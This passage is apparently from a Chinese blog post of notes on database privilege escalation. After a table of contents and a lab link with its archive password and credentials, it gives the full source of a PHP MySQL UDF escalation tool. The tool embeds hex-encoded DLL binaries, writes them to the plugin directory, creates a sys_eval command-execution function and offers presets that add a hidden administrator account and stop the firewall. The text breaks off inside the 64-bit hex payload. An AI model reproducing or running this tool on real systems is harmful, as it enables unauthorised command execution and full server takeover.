当前位置: 首页 > article >正文

数据库提权【笔记总结】

文章目录

  • UDF提权
      • 以有webshell
      • 只有数据库权限
        • 条件
        • 复现
          • msf工具
          • sql语句提权
  • MOF提权
        • 前言
        • 条件
        • 复现
          • msf工具
          • php脚本提权
  • sqlserver提权
      • 前言
      • 条件
      • xp_cmdshell提权
          • 复现
      • 沙盒提权
          • 介绍
          • 复现
  • Oracle提权
      • 靶场搭建
      • 执行任意命令
          • 复现
      • 通过注入存储过程提权(低权限提升至DBA)
          • 原理
          • 利用条件
          • 复现
  • PostgreSQl提权
      • 介绍
      • 复现
          • 创建函数提权
          • 高权限提权
            • 介绍
            • 影响版本
            • 复现

  1. 靶场地址:

    1.  mssql提权,oracle提权(仔细看使用说明,需要修改当前绑定IP)
       https://pan.baidu.com/s/13rdGmscjy-n_iUG1ZyW_Iw?pwd=cong
       解压密码:vmlwrtg%$^sdfgg 
       administrator/abc123!
      
  2. UDF提权

    1. 以有webshell

      1. 通过webshell将脚本上传可访问路径

        1.  <?php
           if (get_magic_quotes_gpc()) { 
           function stripslashes_deep($value) 
           { 
           $value = is_array($value) ? 
           array_map('stripslashes_deep', $value) : 
           stripslashes($value); 
          
           return $value; 
           } 
          
           $_POST = array_map('stripslashes_deep', $_POST); 
           $_GET = array_map('stripslashes_deep', $_GET); 
           $_COOKIE = array_map('stripslashes_deep', $_COOKIE); 
           $_REQUEST = array_map('stripslashes_deep', $_REQUEST); 
           } 
          
           session_start();
           if($_GET['action']=='logout'){
           foreach($_COOKIE["connect"] as $key=>$value){
           setcookie("connect[$key]","",time()-1);
           }
           header("Location:".$_SERVER["SCRIPT_NAME"]);
           }
          
          
          
          
          
          
           if(!empty($_POST['submit'])){
           setcookie("connect[host]",$_POST['host']);
           setcookie("connect[name]",$_POST['name']);
           setcookie("connect[pass]",$_POST['pass']);
           setcookie("connect[db]",$_POST['db']);
           $_COOKIE["connect"]["host"];
           echo "<script>location.href='?action=connect'</script>";
           }
          
          
          
          
          
           if(empty($_GET["action"])){
           ?>
          
          
           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>暗月mysql全版本通杀提权神器(mOon原创)</title>
           </head>
          
          
          
          
          
          
          
          
           <body>
           <form method="post" action="?action=connect">
           <table  border="1" align="center" width="300">
            <caption><h5>暗月mysql全版本通杀提权神器(mOon原创)</h5></caption>
           <tr>
           	<td width="50">HOST:</td>
           	<td width="450"><input type="text" name="host" value="localhost" size="40"></td>
           </tr>
           <tr>
           	<td>NAME:</td>
           	<td><input type="text" name="name" value="root" size="40"></td>
           </tr>
           <tr>
           	<td>PASS:</td>
           	<td><input type="text" name="pass" value="" size="40"></td>
           </tr>
          
           <tr>
           	<td>DB:</td>
           	<td><input type="text" name="db" value="mysql" size="40"></td>
           </tr>
          
           <td colspan="2"><div align="center">
                     <input type="submit" name="submit" value="提交">
           		   
                     <input type="reset" name="Submit" value="重置">
                   </div></td>
           </table>
          
          
           </form>
           <div align="center"><strong>Copyright By mOon 2014</strong><br>
           <span> <font color="red">黑客居家旅游杀人放火爆菊必备暗器</font></span><br>
           Blog:<a href="http://www.moonsec.com" target="_blank">www.moonsec.com</a> Bbs:<a href="http://www.moonsafe.com" target="_blank">www.moonsafe.com</a>
           <a href="http://www.moonsec.com" target="_blank">版本更新</a>
           </div>
          
           </body>
           </html>
          
          
          
           <?php
           exit;
          
           }
          
          
          
           echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
          
          
          
          
           $link = mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
          
           if(!$link){
           echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
           exit;
           }else{
           echo "连接成功<br>";
           echo "版本信息:<br>";
           $str=mysql_get_server_info();
           echo 'MYSQL版本:'.$str."<br>";
           foreach(_ver() as $key=>$value){
           echo $key."-----".$value."<br>";
           } 
           echo "<hr>";
           if($str[2]>=1){
           $pa=str_replace('\\','/',_dir());
            $path=$_SESSION['path']=$pa."/moonudf.dll";
           }else{
           $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
           }
          
           }
          
           $conn=mysql_select_db($_COOKIE["connect"]["db"],$link);
           if(!$conn){
           echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
           exit;
           }else{
           echo "数据库--".$_COOKIE['connect']['db']."--存在<br>";
           }
           echo '<a href="?action=logout">点击退出</a><br>';
          
           echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
           echo  '<table width="680" height="53" border="1">';
           echo    '<tr>';
           echo      '<td colspan="2">当前路径:';  
           echo      "<input name='p' type='text' size='100' value='".dirname(__FILE__)."\'></td>";
           echo    '</tr>';
           echo    '<tr>';
           echo     '<td width="235"><input type="file" name="file"></td>';
           echo      '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';
           echo    '</tr>';
           echo  '</table>';
           echo'</form>';
           if($_POST['subfile']){
           $upfile=$_POST['p'].$_FILES['file']['name'];
          
           if(is_uploaded_file($_FILES['file']['tmp_name']))
           			{
           if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
           echo '上传失败';
           }else{
           echo '上传成功,路径为'.$upfile;
           	  }
          
           			}
          
           					}
          
           echo '<hr>';
           echo '选择UDF导出的版本 win32 & win64 默认32位';
           echo '<form action="?action=dll" method="post"/>';
           echo '<input type="radio" name="udf" value="32" checked="checked">win32&nbsp';
           echo '<input type="radio" name="udf" value="64">win64&nbsp';
           echo '<hr>';
           echo '<table cellpadding="1" cellspacing="2">';
           echo '<tr><td>路径目录为:</td></tr>';
           echo "<tr><td><input type='text' name='dll' size='100' value='$path'/></td>";
           echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
           echo '</table>';
           echo '</form>'; 
           echo '<hr>';
          
          
          
           if($_POST['subudf']){
          
           	if($_POST['udf']=="32"){
          
           			$shellcode=mysql86();
          
           	}else{
           			$shellcode=mysql64();
           	}
          
          
           mysql_query('DROP TABLE Temp_udf');
           $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
           if(!$query){
           echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
           }else{
           $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
           if(!mysql_query($query)){
           echo 'udf插入失败请查看失败内容'.mysql_error();
           }else{
           $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
           if(!mysql_query($query)){
           echo 'udf导出失败请查看失败内容'.mysql_error();
           }else{
           mysql_query('DROP TABLE Temp_udf');
           echo '导出成功';
           }
           }
           }
           }
          
          
           echo '<form name="form2" method="post" action="">';
           echo  '<table width="680" height="100" border="1.2" cellpadding="0" cellspacing="1">';
           echo    '<tr>';
           echo      '<td width="100">文件路径:</td>';
           echo      '<td width="620"><input name="diy" type="text" id="diy" size="50"></td>';
           echo    '</tr>';
           echo    '<tr>';
           echo      '<td>目标路径:</td>';
           echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
           echo    '</tr>';
           echo    '<tr>';
           echo      '<td colspan="2">';
          
           echo        '<div align="right">';
           echo          '<input type="submit" name="Submit2" value="自定义导出">';
           echo      '</div></td></tr>';
           echo '</table>';
           echo '</form>';
          
           if(!empty($_POST['diy'])){
           $diy=str_replace('\\','/',$_POST['diy']);
           $diypath=str_replace('\\','/',$_POST['diypath']);
           mysql_query('DROP TABLE diy_dll');
           $s='create table diy_dll (cmd LONGBLOB)';
           if(!mysql_query($s)){
           echo '创建diy_dll表失败'.mysql_error();
           }else{
           $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
           if(!mysql_query($s)){
           echo "插入自定义文件失败".mysql_error();
           }else{
           $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
           if(!mysql_query($s)){
           echo "导出自定义dll出错".mysql_error();
           }else{
           mysql_query('DROP TABLE diy_dll');
           echo "成功出自定义dll<br>";
           }
          
           }
          
           }
          
           }
          
           echo "<hr>";
           echo '自带命令:<br>';
           echo '<form action="" method="post">';
           echo '<select name="mysql">';
           echo '<option value="create function sys_eval returns string soname \'moonudf.dll\'">创建sys_eval</option>';
           echo '<option value="select sys_eval(\'net user moon$ 123456 /add & net localgroup administrators moon$ /add\')">添加超级管理员</option>';
           echo '<option value="select sys_eval(\'net user\')">查看用户</option>';
           echo '<option value="select sys_eval(\'netstat -an\')">查看端口</option>';
           echo '<option value="select sys_eval(\'net stop sharedacess\')">停止防火墙</option>';
           echo '<option value="select name from mysql.func">查看创建函数</option>';
           echo '<option value="delete from mysql.func where name=\'sys_eval\'">删除sys_eval</option>';
           echo '</select>';
           echo '&nbsp<input type="submit" value="提交" />';
           echo '</form>';
          
           echo '<form action="?action=sql" method="post">';
           echo '自定义SQL语句:<br>';
           echo '<textarea name="mysql" cols="90" rows="10"></textarea>';
           echo '&nbsp<input type="submit" value="执行" />';
           echo '</form>';
          
           echo "回显结果:<br>";
           echo '<textarea cols="90" rows="10" id="contactus" name="contactus">';
           if(!empty($_POST['mysql'])){
           echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
          
           $sql=mysql_query($sql) or die(mysql_error());
           while($rows=@mysql_fetch_row($sql)){
           foreach($rows as $value){
          
           echo iconv("UTF-8", "GB2312//IGNORE",  $value);
          
           }
           }
          
           }
          
           echo '</textarea>';
          
           echo '<hr>';
           print("
           本版支持mysql win32 & win64位 提权
           但是少了某些提权功能,例如反弹函数。
           需要使用反弹函数 请使用以前的版本,但是不支持64位的mysql。
          
           ");
          
          
           function _dir(){
           	$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
           	$row=mysql_query($sql);
           	$rows=mysql_fetch_row($row);
           	return  $rows[1];
          
           }
           function _ver(){
           	$_version=array();
           	$sql="show variables like '%version%'";
           	$row=mysql_query($sql);
           	while($rows=mysql_fetch_row($row)){
          
           	$_version += array($rows[0]=>$rows[1]);
          
          
           	}
           	return $_version;
          
          
           }
          
          
          
           function mysql86(){
          
          
           return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
          
          
          
           }
          
           function mysql64(){
          
           return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D